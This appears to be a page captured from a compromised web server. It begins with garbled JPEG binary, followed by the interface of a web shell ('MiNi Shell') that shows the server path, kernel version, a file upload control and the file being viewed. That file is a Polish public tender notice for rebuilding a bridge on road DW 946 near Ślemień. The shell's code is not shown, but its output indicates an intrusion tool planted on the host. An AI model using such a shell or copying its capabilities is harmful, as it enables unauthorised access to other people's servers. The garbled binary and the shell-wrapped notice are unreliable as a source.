JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240515/0032529601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ROZBIÓRKA I BUDOWA MOSTU NAD CIEKIEM BEZ NAZWY W CIĄGU DW 946 W KM 18+749 W M. ŚLEMIEŃ O NR EWID. 301 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276303005</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lechicka 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-609</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cichocka@zdw.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zdw.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami wojewódzkimi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ROZBIÓRKA I BUDOWA MOSTU NAD CIEKIEM BEZ NAZWY W CIĄGU DW 946 W KM 18+749 W M. ŚLEMIEŃ O NR EWID. 301 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-509128ce-12ac-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00325296</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00043208/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Rozbiórka i budowa mostu nad ciekiem bez nazwy w ciągu DW 946 w km 18+749 w m. Ślemień o nr ew. 301</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdw.katowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zdw.katowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">ZGODNIE Z PKT. 8 SWZ 8.1. W<br/>postępowaniu komunikacja pomiędzy Zamawiającym, a Wykonawcami odbywa się za pośrednictwem platformazakupowa.pl<br/>pod adresem https://platformazakupowa.pl/pn/zdw.katowice<br/>8.2. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, za<br/>pośrednictwem platformy zakupowej Open Nexus.<br/>a) Korzystanie przez wykonawcę z platformy zakupowej Open Nexus jest bezpłatne.<br/>b) Ogólne warunki, zasady oraz sposób świadczenia przez Open Nexus Sp. z o.o. z siedzibą w Poznaniu, ul. Bolesława<br/>Krzywoustego 3, 61-144 Poznań, usług nieodpłatnych dla konta użytkownika drogą elektroniczną, za pośrednictwem<br/>platformazakupowa.pl opisane zostały w Regulaminie (https://platformazakupowa.pl/strona/1-regulamin) dla użytkowników<br/>(Wykonawców), dostępnym również na stronie internetowej https://platformazakupowa.pl<br/>c) Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>• akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>platformazakupowa.pl w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>• zapoznał i stosuje się do Instrukcji składania ofert dostępnej na stronie internetowej platformazakupowa.pl<br/>(https://platformazakupowa.pl/strona/45-instrukcje ).<br/>8.3. W postępowaniu komunikacja między Zamawiającym, a Wykonawcami (w szczególności składanie oświadczeń, dokumentów,<br/>zawiadomień, zapytań do SWZ), z zastrzeżeniem o którym mowa w pkt. 13, odbywa się za pośrednictwem platformazakupowa.pl i<br/>formularza „Wyślij wiadomość do Zamawiającego”.<br/>8.4. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przekazania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie „Wyślij wiadomość do zamawiającego” po którym pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego.<br/>8.5. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na zapytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>Wykonawcy.<br/>8.6. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji:<br/>• pamięć min. 2 GB RAM,<br/>• procesor Intel IV 2 GHZ lub jego nowsza wersja (lub inny procesor o parametrach równoważnych),<br/>• jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>• zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>• włączona obsługa JavaScript,<br/>• zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf.<br/>8.7. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3. Oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar.<br/>CIĄG DALSZY W INFORMACJACH DODATKOWYCH</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ZGODNIE Z PKT. 47 SWZ KLAUZULA INFORMACYJNA Z ART. 13 RODO W CELU<br/>ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L. 2016 r. Nr 119), (Dz. Urz. UE. L. 2018 r.<br/>Nr 127), (Dz. Urz. UE L. 2021 r. Nr 74),dalej „RODO”, informuję, że:<br/>􀀀 administratorem danych osobowych jest Zarząd Dróg Wojewódzkich w Katowicach (ZDW w Katowicach) z siedzibą przy ul.<br/>Lechickiej 24, 40-609 Katowice; tel.: +48 (32) 78 19 211; fax.: +48 (32) 78 19 200; e-mail: sekretariat@zdw.katowice.pl.;<br/>􀀀 Dane kontaktowe Inspektora ochrony danych w ZDW w Katowicach – e-mail: iod@zdw.katowice.pl *;<br/>􀀀 Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>niniejszego zamówienia publicznego;<br/>􀀀 Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 78 ustawy Pzp;<br/>􀀀 Dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>􀀀 Obowiązek podania przez osoby danych osobowych bezpośrednio ich dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>􀀀 W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 Osoba, której dane dotyczą posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>− na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania swoich danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jej<br/>dotyczących narusza przepisy RODO;<br/>􀀀 Osobie, której dane dotyczą nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>______________________<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp.<br/>***Wyjaśnienie: Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WM/TP/240422/1</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót do wykonania obejmuje przebudowę obiektu mostowego, ze względu na zły stan techniczny i niewystarczającą nośność obiektu. Szczegóły zadania opisane zostały w Opisie Przedmiotu Zamówienia, Przedmiarach Robót, dokumentacji i dokumentach zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233280-5 - Wznoszenie barier drogowych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie najwyższą łączną liczbę<br/>przyznanych punktów.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Zamawiający po wyborze oferty najkorzystniejszej zawiadomi wszystkich Wykonawców o wyniku postępowania i przekaże<br/>informację zgodnie z art. 253 ust. 1 ustawy PZP</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI UDZIELONEJ PRZEZ WYKONAWCĘ POWYŻEJ 60 MIESIĘCY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZGODNIE Z PKT. 21 SWZ O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 112 ust.1 ustawy PZP i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z opisem zamieszczonym poniżej, oraz niepodlegający wykluczeniu o którym mowa w art. 108 ust. 1 ustawy PZP i p. 20 SWZ.<br/>21.1.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1/	zdolności do występowania w obrocie gospodarczym<br/>Nie dotyczy<br/>2/	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Nie dotyczy<br/>3/	sytuacji ekonomicznej lub finansowej: <br/>W celu oceny spełniania minimalnego warunku w zakresie sytuacji ekonomicznej Zamawiający uzna, iż Wykonawca spełnił warunek, jeżeli wykaże, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia na kwotę nie mniejszą niż 1 000 000,00 zł<br/>W przypadku podania sumy gwarancyjnej tego ubezpieczenia w walucie obcej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP), który jest dostępny pod adresem www.nbp.pl opublikowany w dniu zamieszczenia ogłoszenia o zamówieniu dla niniejszego postępowania<br/>4/	zdolności technicznej lub zawodowej: <br/>4.a	Wykonawcy<br/>W celu oceny spełniania minimalnego warunku w zakresie zdolności technicznej Wykonawcy Zamawiający uzna, iż Wykonawca spełni wymagania, jeżeli wykaże, że wykonał: <br/>2 roboty budowlane brutto polegające na: budowie, przebudowie obiektu mostowego o łącznej wartości minimum 4 500 000,00 zł brutto, w tym minimum jedna robota z wykonaniem mostu objazdowego (tymczasowego)<br/>nie wcześniej niż w okresie ostatnich 10 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>PRZEZ 1 ROBOTĘ BUDOWLANĄ ROZUMIE SIĘ 1 UMOWĘ.<br/>4.a.a.	w przypadku podania wartości za wykonanie robót w walucie obcej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP), który jest dostępny pod adresem www.nbp.pl opublikowany w dniu zamieszczenia ogłoszenia o zamówieniu dla niniejszego postępowania.<br/>4.a.b.	w przypadku gdy Wykonawca w celu spełnienia warunków udziału w zakresie zdolności technicznej, powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami, to należy podać roboty budowlane, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. Podając zakres i wartość robót budowlanych na załączniku nr 6 do SWZ.<br/>4.a.c.	w przypadku Wykonawców wspólnie ubiegających się o zamówienie składają oświadczenie na załączniku nr 4a do SWZ, z którego wynika, które roboty wykonają poszczególni wykonawcy – zgodnie z art. 117 ust. 4 ustawy PZP<br/>4.b	Osób<br/>W celu oceny spełniania minimalnego warunku w zakresie zdolności zawodowej Zamawiający uzna, iż Wykonawca spełnił warunek, jeżeli wykaże, że będzie dysponował osobami, posiadającymi kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami tj.:<br/>1.	1 osobę posiadającą<br/>Kwalifikacje:	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej bez ograniczeń w rozumieniu Prawa Budowlanego (lub odpowiadające im ważne uprawienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, bądź odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych),<br/>Doświadczenie:	minimum 4 lata doświadczenia na stanowisku kierownika budowy lub kierownika robót przy realizacji inwestycji w zakresie budowy lub przebudowy obiektów mostowych, przy czym co najmniej jedna inwestycja powinna obejmować budowę lub przebudowę obiektu mostowego wraz z mostem objazdowym o wartości robót co najmniej 2 500 000,00 zł brutto<br/>Wyjaśnienie:	w celu wykazania się doświadczeniem należy podać:<br/>	-	nazwę uprawnień i datę ich uzyskania <br/>	-	stanowisko<br/>	-	lata doświadczenia<br/>	-	nazwę zadania i zakres oraz wartość<br/>	w Wykazie osób – załącznik nr 7 do SWZ.<br/><br/>4.c.	Zgodnie z art. 116 ust. PZP, Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">ZGODNIE Z PKT. 22 SWZ Na wezwanie Zamawiającego, Wykonawca zobowiązany jest złożyć następujące 